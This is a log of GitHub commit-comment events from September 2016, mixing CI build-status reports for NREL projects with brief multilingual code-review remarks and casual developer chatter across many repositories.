{"id":"4600064530","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19123998,"position":null,"line":null,"path":null,"commit_id":"eff536c5239fdd16a6b96bdcdc7b6456a58c349d","created_at":"2016-09-22T02:21:38Z","updated_at":"2016-09-22T02:21:38Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1754 of 1758 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.77%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.46%25-green.svg)</a>\n"}},"created_at":"2016-09-22T02:21:38Z"}
{"id":"4600066409","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124008,"position":null,"line":null,"path":null,"commit_id":"eff536c5239fdd16a6b96bdcdc7b6456a58c349d","created_at":"2016-09-22T02:22:25Z","updated_at":"2016-09-22T02:22:25Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T02:22:25Z"}
{"id":"4600067562","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19124011,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-22T02:22:55Z","updated_at":"2016-09-22T02:22:55Z","body":"No problem 👍 "}},"created_at":"2016-09-22T02:22:55Z"}
{"id":"4600073944","type":"CommitCommentEvent","actor":{"login":"qiaoyu2015"},"repo":{"name":"ChinaMobileNG/Visa"},"payload":{"comment":{"id":19124020,"position":null,"line":null,"path":null,"commit_id":"38517dc5b82f54b822a41bad9adc4ab1e2347d3f","created_at":"2016-09-22T02:25:43Z","updated_at":"2016-09-22T02:25:43Z","body":"葫芦娃"}},"created_at":"2016-09-22T02:25:43Z"}
{"id":"4600077218","type":"CommitCommentEvent","actor":{"login":"Madhura12353"},"repo":{"name":"Madhura12353/HelloWorld"},"payload":{"comment":{"id":19124029,"position":5,"line":4,"path":"ReadAndSum.cpp","commit_id":"15f2cb775171ea21a8b1c423656846435101afd1","created_at":"2016-09-22T02:27:13Z","updated_at":"2016-09-22T02:27:13Z","body":"I was hoping you could have finished this earlier."}},"created_at":"2016-09-22T02:27:13Z"}
{"id":"4600078438","type":"CommitCommentEvent","actor":{"login":"tiachristina"},"repo":{"name":"tiachristina/tiachristina.github.io"},"payload":{"comment":{"id":19124036,"position":null,"line":null,"path":null,"commit_id":"eeab4b5c4589e1dd3bfd20e3661b79bb35dfae89","created_at":"2016-09-22T02:27:45Z","updated_at":"2016-09-22T02:27:45Z","body":"changed font"}},"created_at":"2016-09-22T02:27:45Z"}
{"id":"4600079877","type":"CommitCommentEvent","actor":{"login":"diego11039"},"repo":{"name":"SenaiGaveteiro/SenaiProjeto"},"payload":{"comment":{"id":19124040,"position":null,"line":null,"path":null,"commit_id":"8f57d2d285fe0c58a1b380975e5f36bcd6e98bcf","created_at":"2016-09-22T02:28:26Z","updated_at":"2016-09-22T02:28:26Z","body":"Pagina de Cadastro\r\n"}},"created_at":"2016-09-22T02:28:26Z"}
{"id":"4600081858","type":"CommitCommentEvent","actor":{"login":"fdurand"},"repo":{"name":"inverse-inc/packetfence"},"payload":{"comment":{"id":19124048,"position":5,"line":3178,"path":"lib/pf/Switch.pm","commit_id":"5197327d33c813d8cb33a0ee2ec9e4ecfee514ea","created_at":"2016-09-22T02:29:21Z","updated_at":"2016-09-22T02:29:21Z","body":"Read or not to read that is the question."}},"created_at":"2016-09-22T02:29:21Z"}
{"id":"4600082249","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19124049,"position":null,"line":null,"path":null,"commit_id":"44e456cae3b99c4360f842d1f98f501f601722aa","created_at":"2016-09-22T02:29:33Z","updated_at":"2016-09-22T02:29:33Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44e456cae3b99c4360f842d1f98f501f601722aa-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44e456cae3b99c4360f842d1f98f501f601722aa-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-22T02:29:33Z"}
{"id":"4600082863","type":"CommitCommentEvent","actor":{"login":"rdelrosario"},"repo":{"name":"domaven/xamarin-plugins"},"payload":{"comment":{"id":19124051,"position":null,"line":null,"path":null,"commit_id":"74ec1dc4e3413869e315ab0188772323ed9f5c18","created_at":"2016-09-22T02:29:50Z","updated_at":"2016-09-22T02:29:50Z","body":"So is compatible or not?"}},"created_at":"2016-09-22T02:29:50Z"}
{"id":"4600083554","type":"CommitCommentEvent","actor":{"login":"shuleihen"},"repo":{"name":"shuleihen/TDjuwairen"},"payload":{"comment":{"id":19124053,"position":21,"line":21,"path":"TDjuwairen/Modules/SharpDesc/Controllers/DetailTableViewController.h","commit_id":"e469e5c9dc0b4275b4abf5942f2b89f380a877af","created_at":"2016-09-22T02:30:10Z","updated_at":"2016-09-22T02:30:10Z","body":"reply 方法在 .m 中没有实现，如果不使用就移除"}},"created_at":"2016-09-22T02:30:10Z"}
{"id":"4600089624","type":"CommitCommentEvent","actor":{"login":"shuleihen"},"repo":{"name":"shuleihen/TDjuwairen"},"payload":{"comment":{"id":19124067,"position":14,"line":54,"path":"TDjuwairen/Modules/SharpDesc/Views/BackCommentView.m","commit_id":"484ac24a0fe6e15acbd8e6a32eb7af78154d9c68","created_at":"2016-09-22T02:32:51Z","updated_at":"2016-09-22T02:32:51Z","body":"在.h 文件中将不用的 ClickShar和ClickComment 按钮移除"}},"created_at":"2016-09-22T02:32:51Z"}
{"id":"4600090433","type":"CommitCommentEvent","actor":{"login":"juanmottesi"},"repo":{"name":"4Bandits/MagickaProofOfConcept"},"payload":{"comment":{"id":19124068,"position":null,"line":null,"path":null,"commit_id":"86a017283b5177349ef5d38c5dd4d0a925b6e4fd","created_at":"2016-09-22T02:33:14Z","updated_at":"2016-09-22T02:33:14Z","body":"Se agrego un pequeño bug, el personaje ataca solo. Esto se solucionara cuando replique el evento de ataque."}},"created_at":"2016-09-22T02:33:14Z"}
{"id":"4600091341","type":"CommitCommentEvent","actor":{"login":"JC340301"},"repo":{"name":"JC340301/Assignment2"},"payload":{"comment":{"id":19124071,"position":null,"line":null,"path":null,"commit_id":"4f5185d9ce4636f2b992a83a48ddffcce6fc9ae7","created_at":"2016-09-22T02:33:39Z","updated_at":"2016-09-22T02:33:39Z","body":"I will resize the images when I get home or later in school with Ismail's computer."}},"created_at":"2016-09-22T02:33:39Z"}
{"id":"4600092833","type":"CommitCommentEvent","actor":{"login":"thednp"},"repo":{"name":"thednp/kute.js"},"payload":{"comment":{"id":19124074,"position":null,"line":null,"path":null,"commit_id":"728af0a801d29120da712be1f660879e8c71c90e","created_at":"2016-09-22T02:34:20Z","updated_at":"2016-09-22T02:34:20Z","body":"More readable code, the SVG Plugin should work properly with other scripts."}},"created_at":"2016-09-22T02:34:20Z"}
{"id":"4600097213","type":"CommitCommentEvent","actor":{"login":"geerlingguy"},"repo":{"name":"geerlingguy/ansible-role-redis"},"payload":{"comment":{"id":19124084,"position":null,"line":null,"path":null,"commit_id":"f457d0c4f27ddda817b13cde69673ac1e3a1dd35","created_at":"2016-09-22T02:36:19Z","updated_at":"2016-09-22T02:36:19Z","body":"No problem!"}},"created_at":"2016-09-22T02:36:19Z"}
{"id":"4600099837","type":"CommitCommentEvent","actor":{"login":"lucascomp"},"repo":{"name":"lucascomp/EDL"},"payload":{"comment":{"id":19124087,"position":null,"line":null,"path":null,"commit_id":"a49fec8d3cc8f3e43c2a37d02c34f00e59ea1a55","created_at":"2016-09-22T02:37:28Z","updated_at":"2016-09-22T02:37:28Z","body":"Professor @fsantanna:\r\nTrabalho 04 feito individualmente.\r\nTrabalho 05 feito com @TiagoRezende (Divisão dos pontos iguais entre nós dois. Fizemos juntos discutindo pelo Skype)."}},"created_at":"2016-09-22T02:37:28Z"}
{"id":"4600101161","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19124091,"position":null,"line":null,"path":null,"commit_id":"74433cbb8e22190e75620292ea1cca2461d1dac0","created_at":"2016-09-22T02:38:04Z","updated_at":"2016-09-22T02:38:04Z","body":"update_standards_gem (asparke2) - i386-Windows-7-VisualStudio-12: OK (2403 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-74433cbb8e22190e75620292ea1cca2461d1dac0-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-74433cbb8e22190e75620292ea1cca2461d1dac0-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.16%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T02:38:04Z"}
{"id":"4600102700","type":"CommitCommentEvent","actor":{"login":"wisenmini"},"repo":{"name":"shinchiro/shinchiro-encodes"},"payload":{"comment":{"id":19124095,"position":null,"line":null,"path":null,"commit_id":"835362bcc6e082efd422c21c4251252280a94269","created_at":"2016-09-22T02:38:44Z","updated_at":"2016-09-22T02:38:44Z","body":"It's a long shot, but you don't happen to know what happened to minitheatre?"}},"created_at":"2016-09-22T02:38:44Z"}
{"id":"4600106352","type":"CommitCommentEvent","actor":{"login":"dabentou"},"repo":{"name":"dabentou/rebuild"},"payload":{"comment":{"id":19124107,"position":null,"line":null,"path":null,"commit_id":"b15fc61ed086a57f40758ef8504b64a6cf7b37c9","created_at":"2016-09-22T02:40:19Z","updated_at":"2016-09-22T02:40:19Z","body":"这个项目就是一些零碎的知识点，通过阅读源码获得知识，一方面是加强认识，阅读能读懂不一定能实现的很好。因此，一些经典的源码，能实现的话，我们尽量用自己的语言来重现，日积月累，这也是一个很好的提高。"}},"created_at":"2016-09-22T02:40:19Z"}
{"id":"4600108194","type":"CommitCommentEvent","actor":{"login":"davidfowl"},"repo":{"name":"aspnet/BasicMiddleware"},"payload":{"comment":{"id":19124112,"position":null,"line":null,"path":null,"commit_id":"ead052324c911604a18a64594672613cca211115","created_at":"2016-09-22T02:41:05Z","updated_at":"2016-09-22T02:41:05Z","body":"`IRule`"}},"created_at":"2016-09-22T02:41:05Z"}
{"id":"4600113816","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19124128,"position":null,"line":null,"path":null,"commit_id":"8a58b8dc272385a886af1a4594c4055fc90036bd","created_at":"2016-09-22T02:43:20Z","updated_at":"2016-09-22T02:43:20Z","body":"CAutoQueue is actually a Wrapped implementation of System::Collections queue. Use that for Comms instead."}},"created_at":"2016-09-22T02:43:20Z"}
{"id":"4600114281","type":"CommitCommentEvent","actor":{"login":"ruscur"},"repo":{"name":"daxtens/patchwork"},"payload":{"comment":{"id":19124131,"position":null,"line":null,"path":null,"commit_id":"88af79565e9bc85f587c076ed6eddb692f48b02e","created_at":"2016-09-22T02:43:32Z","updated_at":"2016-09-22T02:43:32Z","body":"eww"}},"created_at":"2016-09-22T02:43:32Z"}
{"id":"4600116645","type":"CommitCommentEvent","actor":{"login":"iccir"},"repo":{"name":"snielsen/DeathToDSStore"},"payload":{"comment":{"id":19124135,"position":null,"line":null,"path":null,"commit_id":"621b7400e8dc94dd5f0c7b2a88481e3fe2554afc","created_at":"2016-09-22T02:44:24Z","updated_at":"2016-09-22T02:44:24Z","body":"Note: `__pthread_set_self()` took a `void *`, whereas `_pthread_set_self()` takes a `pthread_t`.  I'm not sure if calling it with the `dummy_pthread_struct` is really what we want, but it seems to work.  _pthread_set_self is in /usr/lib/dyld if you want to go spelunking.  "}},"created_at":"2016-09-22T02:44:24Z"}
{"id":"4600121018","type":"CommitCommentEvent","actor":{"login":"TotalVerb"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19124143,"position":null,"line":null,"path":null,"commit_id":"3a311556050ee70e71c43c3ca6bc86165174da77","created_at":"2016-09-22T02:46:03Z","updated_at":"2016-09-22T02:46:03Z","body":"Has the cause of this been bisected yet?"}},"created_at":"2016-09-22T02:46:03Z"}
{"id":"4600121915","type":"CommitCommentEvent","actor":{"login":"shexiaoheng"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19124146,"position":null,"line":null,"path":null,"commit_id":"9a5d3bacb99275e952619ab142f4381008d13d89","created_at":"2016-09-22T02:46:19Z","updated_at":"2016-09-22T02:46:19Z","body":"👍 "}},"created_at":"2016-09-22T02:46:19Z"}
{"id":"4600123125","type":"CommitCommentEvent","actor":{"login":"soorajkk"},"repo":{"name":"soorajkk/AspnetcoreAngularJsonRPC"},"payload":{"comment":{"id":19124151,"position":null,"line":null,"path":null,"commit_id":"f92cd980c226bbae6d856ce1f5e02416ee2f1d37","created_at":"2016-09-22T02:46:53Z","updated_at":"2016-09-22T02:46:53Z","body":"added get post"}},"created_at":"2016-09-22T02:46:53Z"}
{"id":"4600131810","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-landingpage"},"payload":{"comment":{"id":19124165,"position":5,"line":5,"path":"Assignment #7 (Responsive Design)/js/script.js","commit_id":"fba3b3bcda75a197f150dc865c00ac0dc25df9f9","created_at":"2016-09-22T02:50:35Z","updated_at":"2016-09-22T02:50:35Z","body":"Great job using `$(this)` and toggling the parent element!"}},"created_at":"2016-09-22T02:50:35Z"}
{"id":"4600135618","type":"CommitCommentEvent","actor":{"login":"AaroniusH"},"repo":{"name":"AaroniusH/soundbounce"},"payload":{"comment":{"id":19124175,"position":null,"line":null,"path":null,"commit_id":"0cfff7bcde5bf7aac3021a87142f3f412cabb6ed","created_at":"2016-09-22T02:52:16Z","updated_at":"2016-09-22T02:52:16Z","body":"Hey, uh, I was just trying to clone the repo, but I accidentally made changes. Totally didn't mean to commit stuff, especially to master. Doesn't look like the changes were very impactful, but if someone could revert the changes, that'd be great. I'll try a revert myself, but thought I'd let y'all know. "}},"created_at":"2016-09-22T02:52:16Z"}
{"id":"4600136830","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-landingpage"},"payload":{"comment":{"id":19124179,"position":436,"line":436,"path":"Assignment #7 (Responsive Design)/css/style.css","commit_id":"fba3b3bcda75a197f150dc865c00ac0dc25df9f9","created_at":"2016-09-22T02:52:47Z","updated_at":"2016-09-22T02:52:47Z","body":"Adding the animation is a really nice touch!"}},"created_at":"2016-09-22T02:52:47Z"}
{"id":"4600137231","type":"CommitCommentEvent","actor":{"login":"snielsen"},"repo":{"name":"snielsen/DeathToDSStore"},"payload":{"comment":{"id":19124181,"position":null,"line":null,"path":null,"commit_id":"621b7400e8dc94dd5f0c7b2a88481e3fe2554afc","created_at":"2016-09-22T02:52:58Z","updated_at":"2016-09-22T02:52:58Z","body":"Hmm, until it explodes I am going to call it good enough for now ;)"}},"created_at":"2016-09-22T02:52:58Z"}
{"id":"4600139728","type":"CommitCommentEvent","actor":{"login":"mkeith121"},"repo":{"name":"mkeith121/exercises"},"payload":{"comment":{"id":19124183,"position":null,"line":null,"path":null,"commit_id":"f653811405e016b9d138206063713835abbe5306","created_at":"2016-09-22T02:53:58Z","updated_at":"2016-09-22T02:53:58Z","body":"At present, this code is not executing. \r\n`assert.deepEqual(currentlyExecutingHistory, expectedHistory);`\r\nThe reason being, I am performing my async functions in batches of 5, rather than batches of 4 and 5. That means that, essentially, my functions essentially fire 5 at a time in batches. In order for the next batch to start, all 5 must finish. This is a good solution, but not exactly as optimal as the final test is expecting. \r\n\r\nIf you move the `done()` call to line 43, both of the first tests pass meaning the function is properly keeping the concurrent function calls < 5 and producing the expected output. "}},"created_at":"2016-09-22T02:53:58Z"}
{"id":"4600140872","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19124185,"position":null,"line":null,"path":null,"commit_id":"00250123aa4637c41f5405e0e7886365f0ccf5e9","created_at":"2016-09-22T02:54:28Z","updated_at":"2016-09-22T02:54:28Z","body":"idiot alert systems by thebigsmileXD"}},"created_at":"2016-09-22T02:54:28Z"}
{"id":"4600141426","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124186,"position":null,"line":null,"path":null,"commit_id":"3282e244d53fca3da36869bd607acb99911907e2","created_at":"2016-09-22T02:54:41Z","updated_at":"2016-09-22T02:54:41Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-MacOS-10.9-clang: OK (2334 of 2335 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T02:54:41Z"}
{"id":"4600141811","type":"CommitCommentEvent","actor":{"login":"iccir"},"repo":{"name":"snielsen/DeathToDSStore"},"payload":{"comment":{"id":19124188,"position":null,"line":null,"path":null,"commit_id":"621b7400e8dc94dd5f0c7b2a88481e3fe2554afc","created_at":"2016-09-22T02:54:49Z","updated_at":"2016-09-22T02:54:49Z","body":"Agreed! :)"}},"created_at":"2016-09-22T02:54:49Z"}
{"id":"4600142026","type":"CommitCommentEvent","actor":{"login":"MrSmartZ"},"repo":{"name":"happypeter/haoduoshipin"},"payload":{"comment":{"id":19124189,"position":null,"line":null,"path":null,"commit_id":"5ea98c6c88f4de362f3f1ad3e105bb10b6e4e2f1","created_at":"2016-09-22T02:54:55Z","updated_at":"2016-09-22T02:54:55Z","body":"Interesting"}},"created_at":"2016-09-22T02:54:55Z"}
{"id":"4600142887","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-landingpage"},"payload":{"comment":{"id":19124193,"position":399,"line":399,"path":"Assignment #7 (Responsive Design)/css/style.css","commit_id":"fba3b3bcda75a197f150dc865c00ac0dc25df9f9","created_at":"2016-09-22T02:55:14Z","updated_at":"2016-09-22T02:55:14Z","body":"Your code overall is looking great! Just be careful with your indentation in a few areas like here, and on your hamburger menu list. They are very minor issues in this context, but as your code grows indentation becomes even more important for readability. "}},"created_at":"2016-09-22T02:55:14Z"}
{"id":"4600144269","type":"CommitCommentEvent","actor":{"login":"iccir"},"repo":{"name":"snielsen/DeathToDSStore"},"payload":{"comment":{"id":19124196,"position":null,"line":null,"path":null,"commit_id":"621b7400e8dc94dd5f0c7b2a88481e3fe2554afc","created_at":"2016-09-22T02:55:48Z","updated_at":"2016-09-22T02:55:48Z","body":"(Note to self: if it does explode, the implementation will hopefully be posted to opensource.apple.com at some point, libpthread project, libpthread-218.1.3)"}},"created_at":"2016-09-22T02:55:48Z"}
{"id":"4600150071","type":"CommitCommentEvent","actor":{"login":"donggw2030521"},"repo":{"name":"vuejs/vue-router"},"payload":{"comment":{"id":19124212,"position":26,"line":26,"path":"en/advanced/data-fetching.html","commit_id":"7a37172ffe62efd289dff3995cde623aee670624","created_at":"2016-09-22T02:58:14Z","updated_at":"2016-09-22T02:58:14Z","body":"### kwew"}},"created_at":"2016-09-22T02:58:14Z"}
{"id":"4600153220","type":"CommitCommentEvent","actor":{"login":"MelMiranda"},"repo":{"name":"mauricio-figueroa/TP-DDS"},"payload":{"comment":{"id":19124229,"position":37,"line":289,"path":"tp-dds/src/main/java/view/index.jsp","commit_id":"c58108b43c2403b7855fb1f2df2d34e5430458c4","created_at":"2016-09-22T02:59:34Z","updated_at":"2016-09-22T02:59:34Z","body":"wtfff"}},"created_at":"2016-09-22T02:59:34Z"}
{"id":"4604741409","type":"CommitCommentEvent","actor":{"login":"sebgoa"},"repo":{"name":"skippbox/ansible-cloudstack"},"payload":{"comment":{"id":19136151,"position":15,"line":78,"path":"roles/k8s/templates/k8s-node.j2","commit_id":"d6bc4b26a37b43bc60d4d43530ee1e45d244e791","created_at":"2016-09-22T20:00:23Z","updated_at":"2016-09-22T20:00:23Z","body":"@pst you might be interested by this change. It runs the kubelet via the coreOS kubelet wrapper, which gives us socat on the node (which makes kubectl port-forward work)."}},"created_at":"2016-09-22T20:00:23Z"}
{"id":"4604741785","type":"CommitCommentEvent","actor":{"login":"junghans"},"repo":{"name":"votca/xtp"},"payload":{"comment":{"id":19136153,"position":null,"line":null,"path":null,"commit_id":"72f37f866487f975aeacfa6998377900aac50e5c","created_at":"2016-09-22T20:00:27Z","updated_at":"2016-09-22T20:00:27Z","body":"@12AngryMen : Ok?"}},"created_at":"2016-09-22T20:00:27Z"}
{"id":"4604741868","type":"CommitCommentEvent","actor":{"login":"nachofregeiro"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19136154,"position":null,"line":null,"path":null,"commit_id":"c33842f8f027d0ccd0259e807a3a6c64bc4b81f0","created_at":"2016-09-22T20:00:28Z","updated_at":"2016-09-22T20:00:28Z","body":"Is it ok to have 2 \"typings\" defined?"}},"created_at":"2016-09-22T20:00:28Z"}
{"id":"4604746542","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19136159,"position":6,"line":459,"path":"lib/util.sh","commit_id":"5b780579b6bacb6d1faa407eb32819eece53446b","created_at":"2016-09-22T20:01:18Z","updated_at":"2016-09-22T20:01:18Z","body":"It will never make sense to install the same package groups for each environment. It will have too be different for every toolkit and environment. Already between KDE and xfce its pointless - not to even start with other editions..."}},"created_at":"2016-09-22T20:01:18Z"}
{"id":"4604746688","type":"CommitCommentEvent","actor":{"login":"evil-at-wow"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19136162,"position":null,"line":null,"path":null,"commit_id":"b631370dfcfa178a665c8732cbc9ba60932be6b4","created_at":"2016-09-22T20:01:20Z","updated_at":"2016-09-22T20:01:20Z","body":"You disappoint me, Tobschinksi. Coming from you, I expected to get something like èñtŕý_îđ at least.\r\n\r\nI believe most tables are already using entry, so just call it that for consistency?"}},"created_at":"2016-09-22T20:01:20Z"}
{"id":"4604746943","type":"CommitCommentEvent","actor":{"login":"vgarro"},"repo":{"name":"jonnysamps/ng-cli-relative-assset-plugin"},"payload":{"comment":{"id":19136164,"position":28,"line":64,"path":"index.js","commit_id":"e3b9c796a4503c6570467601f1e37851edf816f7","created_at":"2016-09-22T20:01:23Z","updated_at":"2016-09-22T20:01:23Z","body":"remove `console.log` and dead code"}},"created_at":"2016-09-22T20:01:23Z"}
{"id":"4604748305","type":"CommitCommentEvent","actor":{"login":"hiramzavala"},"repo":{"name":"hiramzavala/zavalafierrrohiram"},"payload":{"comment":{"id":19136168,"position":null,"line":null,"path":null,"commit_id":"ab59cf23826532f3748ee125e1169952c78a373a","created_at":"2016-09-22T20:01:40Z","updated_at":"2016-09-22T20:01:40Z","body":"Zavalafierrrohiram"}},"created_at":"2016-09-22T20:01:40Z"}
{"id":"4604749571","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19136171,"position":null,"line":null,"path":null,"commit_id":"99c92ed3ee9ef7759d54439a9727d6b96d5e5b36","created_at":"2016-09-22T20:01:55Z","updated_at":"2016-09-22T20:01:55Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3967\n"}},"created_at":"2016-09-22T20:01:55Z"}
{"id":"4604750706","type":"CommitCommentEvent","actor":{"login":"iamrudra"},"repo":{"name":"iamrudra/react-workshop"},"payload":{"comment":{"id":19136178,"position":null,"line":null,"path":null,"commit_id":"cf0a3488b115041bdf0798133ee38958adce9829","created_at":"2016-09-22T20:02:07Z","updated_at":"2016-09-22T20:02:07Z","body":"`I think I am done for now.` 😆 "}},"created_at":"2016-09-22T20:02:07Z"}
{"id":"4604752278","type":"CommitCommentEvent","actor":{"login":"lashtear"},"repo":{"name":"lashtear/tinymux"},"payload":{"comment":{"id":19136181,"position":null,"line":null,"path":null,"commit_id":"9616b85f7eb1bd859d0e4c4ef15d3d8294d88386","created_at":"2016-09-22T20:02:23Z","updated_at":"2016-09-22T20:02:23Z","body":"@hexagoncode - Please try with a187fcd18610fbef992ec5c7a65bd8c1f174fb3a"}},"created_at":"2016-09-22T20:02:23Z"}
{"id":"4604754043","type":"CommitCommentEvent","actor":{"login":"iamrudra"},"repo":{"name":"kentcdodds/react-workshop"},"payload":{"comment":{"id":19136182,"position":null,"line":null,"path":null,"commit_id":"cf0a3488b115041bdf0798133ee38958adce9829","created_at":"2016-09-22T20:02:44Z","updated_at":"2016-09-22T20:02:44Z","body":"`I think I am done for now.` 😆 "}},"created_at":"2016-09-22T20:02:44Z"}
{"id":"4604754664","type":"CommitCommentEvent","actor":{"login":"hiramzavala"},"repo":{"name":"hiramzavala/zavalafierrrohiram"},"payload":{"comment":{"id":19136183,"position":null,"line":null,"path":null,"commit_id":"ab59cf23826532f3748ee125e1169952c78a373a","created_at":"2016-09-22T20:02:51Z","updated_at":"2016-09-22T20:02:51Z","body":"yo me comprometo\r\n"}},"created_at":"2016-09-22T20:02:51Z"}
{"id":"4604757074","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19136186,"position":null,"line":null,"path":null,"commit_id":"c33842f8f027d0ccd0259e807a3a6c64bc4b81f0","created_at":"2016-09-22T20:03:19Z","updated_at":"2016-09-22T20:03:19Z","body":"Good catch, fixing thx"}},"created_at":"2016-09-22T20:03:19Z"}
{"id":"4604761380","type":"CommitCommentEvent","actor":{"login":"colobas"},"repo":{"name":"colobas/colobas.github.io.code"},"payload":{"comment":{"id":19136198,"position":26,"line":37,"path":"about.md","commit_id":"e8fc7fb7700377f45b0cd6b0254ab2192f053476","created_at":"2016-09-22T20:04:07Z","updated_at":"2016-09-22T20:04:07Z","body":"Obrigado pela tip!"}},"created_at":"2016-09-22T20:04:07Z"}
{"id":"4604765074","type":"CommitCommentEvent","actor":{"login":"efischer19"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":19136203,"position":5,"line":272,"path":"lms/djangoapps/instructor/enrollment.py","commit_id":"0f4cff21a781cb351bbeb4ed99b0c89cacc635a7","created_at":"2016-09-22T20:04:48Z","updated_at":"2016-09-22T20:04:48Z","body":"makes sense to me 👍 "}},"created_at":"2016-09-22T20:04:48Z"}
{"id":"4604766841","type":"CommitCommentEvent","actor":{"login":"Tobschinski"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19136206,"position":null,"line":null,"path":null,"commit_id":"b631370dfcfa178a665c8732cbc9ba60932be6b4","created_at":"2016-09-22T20:05:07Z","updated_at":"2016-09-22T20:05:07Z","body":"BECAUSE THAT IS WHAT MADE WOW DIE, STOP REMOVING ANY KIND OF DIVERSITY FROM THE GAME."}},"created_at":"2016-09-22T20:05:07Z"}
{"id":"4604771070","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19136210,"position":6,"line":53,"path":"app/scripts/controllers/courier-controller.js","commit_id":"12416ad2115b4f9d4c2213060fc5e86449adb44f","created_at":"2016-09-22T20:05:54Z","updated_at":"2016-09-22T20:05:54Z","body":"por qué borras este?"}},"created_at":"2016-09-22T20:05:54Z"}
